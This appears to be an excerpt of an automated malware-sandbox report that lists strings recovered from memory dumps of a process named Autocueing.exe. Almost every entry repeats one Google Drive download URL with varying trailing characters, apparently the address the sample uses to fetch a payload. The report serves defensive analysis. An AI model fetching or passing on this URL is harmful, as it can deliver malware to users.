      Source: Autocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2830233002.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2933747254.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3324327497.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3302032884.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2982316924.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3391633613.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2956303775.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2887404715.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2945425525.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2876323516.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2818489505.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2852974758.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2899186565.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3368992406.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2910627021.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2922227503.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2806891781.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2971489970.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2864019301.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download0
      Source: Autocueing.exe, 00000008.00000003.3193568265.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2995816614.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3122962700.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2780528849.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2695356999.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2708087359.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2830233002.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3147400004.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2933747254.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2778129056.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2982316924.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3159034020.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2956303775.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2887404715.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242307516.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2945425525.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2876323516.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3018318612.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2754450948.0000000003462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download1A
      Source: Autocueing.exe, 00000008.00000003.2995816614.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2982316924.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3018318612.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download2
      Source: Autocueing.exe, 00000008.00000003.3193568265.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2995816614.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2830233002.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3147400004.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2933747254.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2982316924.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3159034020.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2956303775.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2887404715.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2945425525.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2876323516.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3018318612.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2818489505.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3170311174.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2852974758.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2899186565.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2910627021.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2922227503.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3053814050.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2806891781.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download38
      Source: Autocueing.exe, 00000008.00000003.3346088252.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3312768786.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3334442052.0000000003465000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2780528849.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2695356999.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2708087359.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2830233002.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2933747254.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3324327497.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2778129056.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3391633613.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2956303775.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2887404715.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2945425525.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2876323516.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2754450948.0000000003462000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2671904849.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2754294780.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2765237850.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2818489505.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download43
      Source: Autocueing.exe, 00000008.00000003.3135380542.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download9
      Source: Autocueing.exe, 00000008.00000002.3395765664.00000000033F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download9:
      Source: Autocueing.exe, 00000008.00000003.2646384856.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2658888711.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=download;
      Source: Autocueing.exe, 00000008.00000003.2646384856.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloadCC
      Source: Autocueing.exe, 00000008.00000003.3193568265.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloadF
      Source: Autocueing.exe, 00000008.00000003.3193568265.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3147400004.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3206827523.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloadJ
      Source: Autocueing.exe, 00000008.00000003.3193568265.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2995816614.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3122962700.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2780528849.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2830233002.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3147400004.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2933747254.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2778129056.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2982316924.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3159034020.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2956303775.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2887404715.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242307516.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2945425525.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2876323516.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3018318612.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2754450948.0000000003462000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3206827523.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloadL
      Source: Autocueing.exe, 00000008.00000003.3193568265.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3206827523.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3170311174.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3182811158.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloadP
      Source: Autocueing.exe, 00000008.00000003.2765349755.0000000003462000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloadT
      Source: Autocueing.exe, 00000008.00000002.3395765664.0000000003432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloadW3
      Source: Autocueing.exe, 00000008.00000003.2887404715.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2899186565.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloadY
      Source: Autocueing.exe, 00000008.00000003.2995816614.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2982316924.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3018318612.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloadce
      Source: Autocueing.exe, 00000008.00000003.3312768786.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3193568265.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3334442052.0000000003465000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3122962700.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2780528849.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2695356999.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3279195163.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2708087359.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2830233002.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3147400004.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3324327497.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2778129056.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3302032884.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3159034020.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2622041447.0000000003464000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2887404715.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242307516.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2876323516.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloadcn
      Source: Autocueing.exe, 00000008.00000003.3170311174.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloadd
      Source: Autocueing.exe, 00000008.00000003.2995816614.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2982316924.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3018318612.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloade-
      Source: Autocueing.exe, 00000008.00000003.3346088252.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3334442052.0000000003465000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2609864429.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3122962700.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2780528849.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2695356999.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2708087359.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2830233002.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3147400004.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2933747254.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2778129056.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2622041447.0000000003464000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2887404715.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2876323516.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2754450948.0000000003462000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3136123204.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2598173162.0000000003464000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2671904849.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2754294780.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2765237850.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloadeh
      Source: Autocueing.exe, 00000008.00000003.3018318612.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloader
      Source: Autocueing.exe, 00000008.00000003.2830233002.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloadi9
      Source: Autocueing.exe, 00000008.00000003.2910627021.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2922227503.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloadic
      Source: Autocueing.exe, 00000008.00000003.3346088252.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3312768786.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3193568265.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3334442052.0000000003465000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2995816614.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3122962700.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2780528849.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2695356999.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3279195163.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2708087359.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2830233002.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3147400004.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2933747254.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3324327497.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2778129056.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3302032884.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2982316924.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3159034020.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloadid
      Source: Autocueing.exe, 00000008.00000003.2995816614.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2982316924.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2956303775.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3018318612.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2971489970.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3006734632.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloadis
      Source: Autocueing.exe, 00000008.00000003.3346088252.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3334442052.0000000003465000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2995816614.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2609864429.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3122962700.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2780528849.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2695356999.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2708087359.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2830233002.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2933747254.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2778129056.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2982316924.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2622041447.0000000003464000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2956303775.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2887404715.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2945425525.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2876323516.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3018318612.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloadl
      Source: Autocueing.exe, 00000008.00000002.3395765664.0000000003432000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloadnK
      Source: Autocueing.exe, 00000008.00000003.3346088252.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3312768786.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3193568265.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3334442052.0000000003465000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2995816614.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3122962700.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3089505610.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3042334490.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3279195163.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000002.3395765664.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3147400004.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3256468742.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3324327497.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3302032884.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2982316924.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3159034020.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3391633613.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.2956303775.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3242307516.0000000003463000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3018318612.000000000345E000.00000004.00000020.00020000.00000000.sdmp, Autocueing.exe, 00000008.00000003.3206827523.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloadom
      Source: Autocueing.exe, 00000008.00000003.3076301554.000000000345E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1_v7mPqiekafjqjNlgzAtvpzw_A7pqv34&export=downloadoo
